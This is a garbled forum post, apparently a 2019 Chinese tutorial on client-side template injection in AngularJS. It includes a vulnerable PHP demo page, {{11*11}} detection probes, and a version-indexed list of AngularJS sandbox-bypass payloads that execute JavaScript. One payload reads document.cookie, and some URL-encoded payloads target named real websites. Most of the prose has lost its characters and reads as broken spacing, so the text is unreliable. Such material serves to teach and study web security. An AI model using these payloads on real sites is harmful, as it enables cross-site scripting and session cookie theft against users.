搜索

[18790] 2019-06-23_csti漏洞总结

文档创建者:s7ckTeam
浏览次数:6
最后更新:2025-01-18
2019-06-23_csti漏洞总结 c s t i c r h u a   h u a s e c   2 0 1 9 - 0 6 - 2 3 0 1 ( C l i e n t - s i d e   t e m p l a t e   i n j e c t i o n c s t i ) 使 C S T I S S T I 使 C S T I J a v a S c r i p t X S S 0 2 C S T I ( 1 )   ( 2 )   f u z z , { { 1 1 * 1 1 } }   =   { { 1 2 1 } } [ [ 1 1 * 1 1 ] ] = [ [ 1 2 1 ] ] 0 3 A n g u l a r J S A n g u l a r J S J a v a S c r i p t 使 A n g u l a r J S 1 h t m l a n g u l a r j s 2   " n g - a p p " X S S 使 h t m l s p e c i a l c h a r s < h t m l >       < b o d y >             < p >                   < ? p h p                       $ q   =   $ _ G E T [ ' q ' ] ;                       e c h o   h t m l s p e c i a l c h a r s ( $ q E N T _ Q U O T E S ) ;                 ? >             < / p >     < / b o d y >   < / h t m l > < h t m l >       < s c r i p t   s r c = " h t t p s : / / c d n . s t a t i c f i l e . o r g / a n g u l a r . j s / 1 . 4 . 7 / a n g u l a r . m i n . j s " > < / s c r i p t >     < b o d y >           < d i v   n g - a p p = " " >               < p >                   < ? p h p                       $ q   =   $ _ G E T [ ' q ' ] ;                       e c h o   h t m l s p e c i a l c h a r s ( $ q E N T _ Q U O T E S ) ;                 ? >             < / p >         < / d i v >  
使 A n g u l a r J S 使 h t m l s p e c i a l c h a r s 使 X S S A n g u l a r J S   1 . 0 . 8 A n g u l a r s c o p e 西 s c o p e s c o p e . u s e r n a m e A n g u l a r J S ( 1 . 0 . 8 ) g e t t e r F n b c a : a . b 1 a [ " b " ]   1 a 使   t o S t r i n g ( )   a t o S t r i n g   { {   a l e r t ( 1 )   } } a l e r t ( ) s c o p e n o o p ( ) J a v a S c r i p t s c o p e s c o p e . c o n s t r u c t o r s c o p e . c o n s t r u c t o r . c o n s t r u c t o r F u n c t i o n ( " a l e r t ( 1 ) " ) a l e r t ( 1 ) a l e r t ( 1 ) p a y l o a d :         < / d i v >       < / b o d y >   < / h t m l > a   =   { b : 1 ,   c : 2 } s c o p e [ " a l e r t " ] ( 1 ) { { c o n s t r u c t o r . c o n s t r u c t o r ( " a l e r t ( 1 ) " ) ( ) } }
A n g u l a r J S   1 . 4 . 7 p a y l o a d : A n g u l a r J S   1 . 2 . 1 8 p a y l o a d : A n g u l a r J S   S a n d b o x   B y p a s s   C o l l e c t i o n { { ' a ' . c o n s t r u c t o r . p r o t o t y p e . c h a r A t = ' a ' . c o n c a t ;   $ e v a l ( ' e x p l o i t = 1 }   }   } ; a l e r t ( 1 ) / / ' ) ; } } { { ( _ = ' ' . s u b ) . c a l l . c a l l ( { } [ $ = ' c o n s t r u c t o r ' ] . g e t O w n P r o p e r t y D e s c r i p t o r (   _ . _ _ p r o t o _ _ , $ ) . v a l u e , 0 , ' a l e r t ( 1 ) ' ) ( ) } } V e r s i o n s   1 . 3 . 0   -   1 . 5 . 7 : { { a = t o S t r i n g ( ) . c o n s t r u c t o r . p r o t o t y p e ; a . c h a r A t = a . t r i m ; $ e v a l ( ' a , a l e r t ( 1 ) , a ' ) } }   V e r s i o n s   1 . 2 . 2 0   -   1 . 2 . 2 9 : { { a = " a " [ " c o n s t r u c t o r " ] . p r o t o t y p e ; a . c h a r A t = a . t r i m ; $ e v a l ( ' a " , a l e r t ( a l e r t = 1 ) , " ' ) } }   V e r s i o n   1 . 2 . 1 9 : { { c = t o S t r i n g . c o n s t r u c t o r ; p = c . p r o t o t y p e ; p . t o S t r i n g = p . c a l l ; [ " a " , " a l e r t ( 1 ) " ] . s o r t ( c ) } }   V e r s i o n s   1 . 2 . 6   -   1 . 2 . 1 8 : { { ( _ = ' ' . s u b ) . c a l l . c a l l ( { } [ $ = ' c o n s t r u c t o r ' ] . g e t O w n P r o p e r t y D e s c r i p t o r ( _ . _ _ p r o t o _ _ , $ ) . v a l u e , 0 , ' a l e r t ( 1 ) ' ) ( ) } }   V e r s i o n s   1 . 2 . 0   -   1 . 2 . 5 : { { a = " a " [ " c o n s t r u c t o r " ] . p r o t o t y p e ; a . c h a r A t = a . t r i m ; $ e v a l ( ' a " , a l e r t ( a l e r t = 1 ) , " ' ) } }
0 4 C S T I X S S X S S p a y l o a d : 访 A n g u l a r J S   I n j e c t i o n [ [ 5 * 5 ] ] 2 5   a n g u l a r . v e r s i o n a n g u l a r j s 1 . 1 . 5 [ [ c o n s t r u c t o r . c o n s t r u c t o r ( ' a l e r t ( d o c u m e n t . c o o k i e ) ' ) ( ) ] ] X S S h t t p s : / / h a c k e r o n e . c o m h t t p s : / / p a s t e b i n . c o m / x M X w s m 0 N Z N 1 7 _ K a r b u t o v _ C S T I _ P D F ( p s : c s t i { { a = " a " [ " c o n s t r u c t o r " ] . p r o t o t y p e ; a . c h a r A t = a . t r i m ; $ e v a l ( ' a " , a l e r t ( a l e r t = 1 ) , " ' ) } } h t t p s : / / w w w . e c o b e e . c o m a n g u l a r   i n j e c t i o n   v i a   C S T I s = { { x   =   { ' y ' : ' ' . c o n s t r u c t o r . p r o t o t y p e } ;   x [ ' y ' ] . c h a r A t = [ ] . j o i n ; $ e v a l ( ' x = a l e r t ( / M i k / ) ' ) ; } }   h t t p s : / / w w w . e c o b e e . c o m / ? s = % 7 B % 7 B x % 2 0 = % 2 0 % 7 B % 2 7 y % 2 7 : % 2 7 % 2 7 . c o n s t r u c t o r . p r o t o t y p e % 7 D % 3 B % 2 0 x % 5 B % 2 7 y % 2 7 % 5 D . c h a r A t = % 5 B % 5 D . j o i n % 3 B $ e v a l ( % 2 7 x = a l e r t ( / M i k / ) % 2 7 ) % 3 B % 7 D % 7 D h t t p s : / / 1 3 3 7 t e s t . d r c h r o n o . c o m / m e s s a g e s / r e f e r r a l s / c o n t a c t s /
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理